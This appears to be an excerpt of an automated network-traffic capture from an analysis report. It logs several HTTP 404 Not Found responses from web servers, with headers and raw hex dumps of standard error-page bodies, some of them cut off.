            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:00 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 
6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:03 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:05 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:08 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:08 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFeR61Favkmtd%2FCCIaNnbqBf7cIn1p%2BY8DNB7GZ75LVVdA693jbZmguceiFUtcpwr5xUbiMHC%2FWsLEnDn0ewajuHYLpfB1%2BW4QTFwnSCQ%2BWWcd7c3xPFF6aoG7IwUomEaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d76334c9020f6f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UXJODCru3E7%2BYKtEYeDhBg5GaCiHTtMc2F0Zpy5wvsTB7kIbk6%2B8BDT2DldnKbB2ryZN9CJDFRFeVfNZbc0Q1qJs6Bbj%2B3aPV8huajNQrjRlZIsLS7Rc7OuQ02lzH%2F7otA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d76344bba619ff-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 